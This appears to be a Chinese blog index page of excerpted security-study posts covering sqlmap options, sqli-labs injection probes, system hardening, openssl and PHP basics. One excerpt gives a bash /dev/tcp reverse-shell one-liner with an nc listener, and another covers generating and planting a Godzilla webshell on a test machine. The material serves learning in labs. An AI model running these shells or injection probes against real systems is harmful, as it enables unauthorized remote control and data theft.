- 博客(31)
- 收藏
- 关注
RSS订阅原创 Sqlmap参数
参数功能目标参数参数:-u 直接输入目标URL参数:-m 从文件中取出保存的URL进行检测参数:-r 从文本中获取http请求参数:-g 测试注入Google的搜索结果的GET参数参数:-l 从Burp或者WebScarab代理中获取日志枚举参数参数:-b,–banner 列出版本号参数:–dbs 列出所有数据库的库名参数:–current-db 列出当前使用的数据库库名参数:–tables 列出数据库中的表
2022-02-18 17:32:20
1295
原创 sql-labs数字型、字符型注入
访问SQLi-Labs网站一、数字型注入1、访问less-2访问后根据提示先给定一个GET参数http://127.0.0.1/bc/sqli-labs/Less-2/?id=1此时页面显示id=1的用户名和密码2、寻找注入点、判断注入类型http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >>
2022-02-16 20:36:02
3722
原创 Mysql数据库操作
Mysql基础操作1、连接数据库进入mysql的bin目录下在导地址栏输入cmd输入命令:mysql -u root -p之后出现 “ Enter password: ” 的提示,输入密码即可登录2、显示系统中所有数据库输入命令show databases;大部分sql命令都已分号(;)作为结束符3、新建数据库abc命令:create database abc;新建成功后使用以下命令查看结果show databa...
2022-02-13 17:47:09
1000
原创 DNS信息查询
域名系统是因特网的一项服务,他作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便的访问互联网。DNS使用TCP和UDP端口53。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符1、使用whois命令对域名进行查询whois sangforedu.com.cn我们发现了一个新的域名:sangfor.com.cn通过站长之家网站进行域名反查又发现了一些新的。2、使用nslookup工具进行域名查询3、使用di...
2022-01-16 20:09:14
3047
原创 移动接入安全
移动接入概述1.需求背景1.1、移动办公/远程办公已成常态移动/远程办公拓展了组织网络边界让组织更充分的利用互联网让组织的信息化建设发挥更大价值1.2、移动接入成为企业信息安全的短板开放远程接入,让企业构建的安全边界失去作用互联网更为复杂的网络环境和层出不穷的网络威胁攻防失衡:个人终端薄弱的安全防护、高价值的企业数据驱动黑客攻击1.3、高价值数据资产(公司命脉)公司命脉 一旦泄露,损失惨重1.4、重要的业务系统黑客攻击的首要目标1.5、安全
2022-01-04 20:44:45
3357
原创 TCP/IP和OSI和UDP
OSI七层模型与TCP/IP协议栈模型对应关系.,各个层对应协议有哪些?TCP/UDP协议的区别及应用场景?TCP 是面向连接的,UDP 是面向无连接的,TCP提供可靠的服务TCP 保证数据正确性,UDP 可能丢包 TCP 保证数据顺序,UDP 不保证UDP具有较好的实时性,工作效率比TCP高,适用于对高速传输和实时性有较高的通信或广播通信。TCP数据传输慢,UDP数据传送快每一条TCP连接只能是点到点的;UDP支持一对一,一对多,多对一和多对多的交互通信。UDP 的主.
2021-12-20 19:27:49
144
原创 基线管理之apache安全配置
一、确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.conf下翻可以找到以下配置其中,第一行和第四行,指明了目录,即Linux的根目录 /第二行,表示禁止使用.htaccess文件,覆盖此处配置第三行,表示禁止访问根目录二、删除网站的目录浏览权限apache会在默认路径下开启目录浏览继续查看apache配置文件,如图,其中Indexes即为目录浏览权限,直接删除掉即可。
2021-12-13 21:01:57
88
原创 Windows安全配置
打开组策略win+R输入gpedit.mscWindows设置--安全设置--账户策略--密码策略账户锁定策略配置安全选项改变系统管理员账户交互式登录限制用户账户行为管理Windows设置--安全设置--本地策略--高级审核策略配置--系统审核策略--账户登录账户管理详细跟踪登录注销对象访问...
2021-12-13 20:02:31
2436
原创 基线管理之MariaDB安全配置
操作系统级权限检查1、检查数据库的运行权限,不建议以root运行数据库,防止越权攻击ps -ef | egrep "^mysql.*$"如图显示mysqld的运行用户为mysql2、禁用mariadb的历史记录功能查找缓存文件find $HOME -name ".mysql_history"将缓存文件指向空文件rm -f $HOME/.mysql_historyln -s /dev/null $HOME/.mysql_history3、查看并配置数据库存放路.
2021-12-13 19:40:19
2331
原创 Windows基础操作
Windows基础win+r 输入 cmd 进入命令提示符界面dir 列出当前目录下所有文件 与Linux下的 ls 类似dir /a 列出全部目录dir /b 只显示当前目录下文件夹和文件的名字cd <目录路径> 进入某个目录cd .. 返回上一个目录文件夹有空格,需要双引号没有不需要切换其他盘符D...
2021-12-08 20:51:45
840
1
原创 Linux主机系统加固
账号和口令禁用或删除无用账号,降低安全风险操作步骤cat /etc/shadow //查看有多少账户 userdel <用户名> //删除不必要账号 passwd -l <用户名> //锁定不必要的账号 passwd -u <用户名> //解锁必要的账号检查特殊账号检查是否存在空口令和root权限的账号。操作步骤查看空...
2021-12-07 17:43:32
212
原创 OPENSSL基础使用
掌握常见的密码学算法应用des aes md5 rsa等一台Centos 7.2 已经安装openssl组件openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。创建一个文件,用于被加密,文件内容为123456,文件名为123.txt一、对称加密1、使用rc4加解密openssl enc -e -rc4 -in 123.txt -out 123_rc4.enc解密openssl e..
2021-12-06 19:57:35
425
原创 使用phpstudy的Linux版本搭建emlog
安装phpstudy操作系统:全新的系统(支持CentOS、Ubuntu、Debian、Fedora、Deepin)等请确保您的系统是纯静的,未安装任何环境中涉及到的(Apache\Nginx\php\MySQL\FTP)内存要求:内存要求最低512MB,推荐768MB以上,纯面板约占系统60MB内存Centos安装脚本yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.
2021-12-02 20:48:47
277
1
原创 PHP 数据类型
PHP 数据类型String(字符串), Integer(整型), Float(浮点型), Boolean(布尔型), Array(数组), Object(对象), NULL(空值)PHP 整型整数是一个没有小数的数字。整数规则:整数必须至少有一个数字 (0-9)整数不能包含逗号或空格整数是没有小数点的整数可以是正数或负数整型可以用三种格式来指定:十进制, 十六进制( 以 0x 为前缀)或八进制(前缀为 0)。<?php$x = 5985;var_dump($x);...
2021-12-01 20:29:26
252
原创 php基础
php?PHP是一种通用开源脚本语言。 PHP 脚本在服务器上执行。 PHP 可免费下载使用。PHP 文件?PHP 文件可包含文本、HTML、JavaScript代码和 PHP 代码。 PHP 代码在服务器上执行,结果以纯 HTML 形式返回给浏览器。 PHP 文件的默认文件扩展名是 ".php"。PHP 能做?PHP 可以生成动态页面内容。 PHP 可以创建、打开、读取、写入、关闭服务器上的文件。 PHP 可以收集表单数据。 PHP 可以发送和接收 cookies。 PHP
2021-11-30 20:40:15
188
原创 URL编码
URL编码 url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码作为URL的一部分或者分离地发给服务器。URL编码遵循下列规则: 每对name/value由&;符分开;每对来自表单的name/value由=符分开。如果用户没有输入值给这个name,那么这个name还是出现,只是无值。UTF-8 UTF-8是针对Unicode的一种可变长度字符编码。它可以用来表示Unicode标准中的任...
2021-11-29 19:14:22
3952
原创 HTML 状态消息
200 请求成功,一般用于GET与POST请求301 所请求的页面已经转移至新的url。永久移动。302 所请求的页面已经临时转移至新的url。临时移动。400 客户端请求的语法错误,服务器未能理解请求。401 被请求的页面需要用户名和密码。请求要求用户的身份认证403 对被请求页面的访问被禁止。404 服务器无法找到被请求的页面。500 请求未完成。服务器遇到不...
2021-11-29 16:36:55
1212
原创 反弹shell
反弹shell,是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。在攻击主机上执行端口监听:nc -lvvp port #port 为攻击机的端口号,并此端口未被占用一、在目标主机上执行:bash -i >& /dev/tcp/0.0.0.0/port 0>&1 #0.0.0....
2021-11-26 19:51:27
248
原创 godzilla的使用
下载godzilla链接:https://pan.baidu.com/s/1zqZ_1I-oqFY4HvJiAJzqgw提取码:vwlc新建一个文件夹将下载后的jar文件放进去双击打开打开后会生成一个data.db文件启动需要java环境启动后进入以下界面生成一句话木马点击顶部菜单栏的管理,选择生成打开以下界面设置密码、密钥、有效载荷、加密器点击生成,设置文件名为php将php文件放入测试机的html目录下回到godzilla...
2021-11-26 19:37:16
1836
原创 Linux中sed、awk介绍使用
sed是一个流处理编辑器,他能自动处理文件、分析日志文件、修改配置文件等。可以不对源文件进行改动,把整个文件输出到屏幕可以把匹配的内容输出到屏幕还可以对源文件进行改动,但不会在屏幕上返回结果sed动作a:新增,a后面可以接字串,新增字串会在目前的下一行c:取代,c后面可以接字串,这些字串n1,n2之间的行d:删除,i:插入,i后面接字串,新增的字串会出现在上一行p:打印,将某个数据显示出来s:替换,可以进行替换sed示例示例文件查找行:..
2021-11-25 21:32:53
400
原创 Linux搭建lamp
1.安装httpd mariadb mariadb-server php php-mysqlyum install -y httpdyum install -y mariadbyum install -y mariadb-serveryum install -y phpyum install -y php-mysql2.启动httpd mariadb,设置httpd mariadb开机自启systemctl start httpdsystemctl start maria
2021-11-25 20:29:51
62
原创 Linux基础
一、Linux系统概述 Linux 内核最初是由李纳斯•托瓦兹(Linus Torvalds)在赫尔辛基大学读书时出于个人爱好而编写的,第 1 版本于 1991 年 9 月发布,当时仅有 10 000 行代码。 Linux 是一套免费使用和自由传播的类 Unix 操作系统,是一个基于 POSIX 和 UNIX 的多用户、多任务、支持多线程和多 CPU 的操作系统。二、Linuxlinux系统与Windows系统的区别三、linux系统目录结构概述/bin...
2021-11-22 19:10:22
713
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人